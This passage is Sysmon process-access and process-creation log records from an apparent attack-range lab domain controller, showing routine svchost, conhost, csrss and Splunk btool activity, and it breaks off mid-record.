{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3416,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3417,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3418,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3419,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-0010A76F0500}\r\nTargetProcessId: 2552\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010A76F0500}","TargetProcessId":"2552","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3420,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.154\r\nProcessGuid: {E2A3D6B1-1103-5F25-0000-001063700500}\r\nProcessId: 4136\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list httpServerListener: --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-0010A76F0500}\r\nParentProcessId: 2552\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list httpServerListener: --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.154","ProcessGuid":"{E2A3D6B1-1103-5F25-0000-001063700500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list httpServerListener: --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-0010A76F0500}","ParentProcessId":"2552","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list httpServerListener: --no-log","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3421,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010A76F0500}\r\nSourceProcessId: 2552\r\nSourceThreadId: 2556\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-001063700500}\r\nTargetProcessId: 4136\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010A76F0500}","SourceProcessId":"2552","SourceThreadId":"2556","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-001063700500}","TargetProcessId":"4136","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3422,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-001063700500}\r\nTargetProcessId: 4136\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-001063700500}","TargetProcessId":"4136","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3423,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3424,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3425,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 